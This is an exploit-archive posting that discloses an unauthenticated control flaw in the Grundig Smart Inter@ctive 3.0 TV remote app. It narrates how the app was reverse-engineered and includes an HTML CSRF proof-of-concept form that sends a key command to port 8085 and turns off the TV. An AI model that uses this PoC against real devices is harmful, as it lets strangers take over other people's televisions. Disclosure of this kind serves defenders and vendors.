what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Grundig Smart Inter@ctive 3.0 Insecure Direct Object Reference

Grundig Smart Inter@ctive 3.0 Insecure Direct Object Reference
Posted Jul 9, 2018
Authored by Ahmethan Gultekin

Grundig Smart Inter@ctive version 3.0 suffers from an insecure direct object reference vulnerability.

tags | exploit
advisories | CVE-2018-13989
SHA-256 | e6a894919421dc2603167ef46eba1bba259d4560c2e150753fa0a552e215ee4b

Grundig Smart Inter@ctive 3.0 Insecure Direct Object Reference

Change Mirror Download
# Exploit Title: Grundig Smart Remote App CSRF
# Google Dork: Local Vulnerability
# Date: 06.07.2018
# Exploit Author: Ahmethan GALTEKAdegN ~ @inject0r16
# Vendor Homepage: https://www.grundig.com/
# Software Link: https://play.google.com/store/apps/details?id=arcelik.
android.grundig.remote
# Version: Grundig Smart Inter@ctive 3.0
# Tested on: Windows 7-8-10
# CVE : none

Hello! I'm trying my TV.I saw a Grundig remote control application on
Google Play.
Computer I downloaded and decompiled APK. And I began to examine individual
classes.
I noticed in a class that a request was sent during operations on the
command line.
I downloaded the phone packet viewer and opened the control application and
made some operations.
And I saw that there was such a request;

GET /sendrcpackage?keyid=-2547&keysymbol=-4078 HTTP/1.1

I noticed that each process has an id value. Then I turned off the
television using the control application and noted the outgoing IDs.
The only requirement for the connection between the TV and the application
was to have the same IP address.
After I made the IP address on the TV and the phone and the IP address on
the computer the same: I accessed the interface from the 8085 port.
Now I could do anything from the computer :)

CSRF POC :

<html>
<head>
<title>Grundig TV PoC</title>
</head>
<body>
<h1>Grundig Inter@ctive 3 Shutdown PoC</h1>
<form method="POST" action="http://TargetIP:8085/sendrcpackage?keyid=-2544&
keysymbol=-4081
<http://targetip:8085/sendrcpackage?keyid=-2544&keysymbol=-4081>">
<input type="submit" value="Go!">
</form>
</body>
</html>

this poc will turn off the television when it is running. :)

video about vulnerability;
https://youtu.be/H7WYTkgtwsY


#MoreThanYouImagine! ~ ahmeth4n.org

greetz : @SmashTheKernel , @t3beq , @c_c0re
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    8 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    11 Files
  • 23
    Apr 23rd
    68 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close